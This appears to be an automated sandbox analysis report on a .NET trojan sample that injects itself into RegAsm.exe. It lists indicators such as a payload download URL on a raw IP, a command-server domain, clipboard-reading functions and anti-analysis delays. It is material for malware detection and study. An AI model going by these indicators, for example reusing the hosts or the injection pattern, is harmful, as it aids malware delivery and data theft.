    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/u888.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/u888.exeP
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1253157073.00000000027DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/&%
    Source: RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/.%
    Source: RegAsm.exe, 00000003.00000002.1292012501.0000000000FA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1292062764.0000000000FAF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/api
    Source: RegAsm.exe, 00000003.00000002.1291749878.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://traineiwnqo.shop/apim
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49705 version: TLS 1.2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004297F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004297F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,3_2_004297F0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF31B40_2_00CF31B4
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043406B3_2_0043406B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042EB213_2_0042EB21
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BFE13_2_0040BFE1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040181E3_2_0040181E
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004358303_2_00435830
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004070A03_2_004070A0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004141603_2_00414160
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004351103_2_00435110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004201C03_2_004201C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041C1E03_2_0041C1E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CA403_2_0041CA40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410A4B3_2_00410A4B
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00419A553_2_00419A55
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00404A103_2_00404A10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004112203_2_00411220
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00432A303_2_00432A30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004253423_2_00425342
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410B4D3_2_00410B4D
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041EB5F3_2_0041EB5F
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004233003_2_00423300
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00436B003_2_00436B00
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00407BE03_2_00407BE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00406B803_2_00406B80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042DB803_2_0042DB80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DBA23_2_0041DBA2
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004053B03_2_004053B0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00423C243_2_00423C24
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00403C303_2_00403C30
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004354E03_2_004354E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040CC803_2_0040CC80
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004024803_2_00402480
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004354923_2_00435492
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00411D503_2_00411D50
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004135553_2_00413555
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040C5103_2_0040C510
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5E03_2_0040B5E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00405E403_2_00405E40
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CE703_2_0041CE70
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00436E103_2_00436E10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004086F03_2_004086F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041CF423_2_0041CF42
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004077503_2_00407750
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DF693_2_0041DF69
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_004207103_2_00420710
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00403FD03_2_00403FD0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041A7D83_2_0041A7D8
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040EFE03_2_0040EFE0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401F983_2_00401F98
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418F9A3_2_00418F9A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00434FB03_2_00434FB0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004091D0 appears 44 times
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004099A0 appears 105 times
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000002.1252293838.00000000009CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, 00000000.00000000.1232989270.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeBinary or memory string: OriginalFilenameConsoleApp66.exe: vs SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe, Settings.csBase64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
    Source: classification engineClassification label: mal100.troj.evad.winEXE@5/1@3/3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042EB21 SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,CoCreateInstance,CoCreateInstance,3_2_0042EB21
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe.logJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMutant created: NULL
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Users\Administrator\Desktop\RunPE-x\ConsoleApp66\obj\Release\ConsoleApp66.pdb source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exe
    Source: SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeStatic PE information: 0x8B22E0EF [Mon Dec 21 13:53:51 2043 UTC]
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF2298 push edx; retf 5500h0_2_00CF2586
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF05C9 push esp; retf 0000h0_2_00CF05CA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF0598 push esp; retf 0000h0_2_00CF05BA
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF0505 push eax; retf 0000h0_2_00CF050A
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeCode function: 0_2_00CF0605 push esp; retf 0000h0_2_00CF060A
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043DABC push eax; retn 0041h3_2_0043DABD
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043D5A0 push edi; retn 0041h3_2_0043D5A1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0043D63E push eax; iretd 3_2_0043D669
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory allocated: 2780000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeMemory allocated: 4780000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.InjectNET.17.23993.14959.exeWindow / User API: threadDelayed 3224Jump to behavior
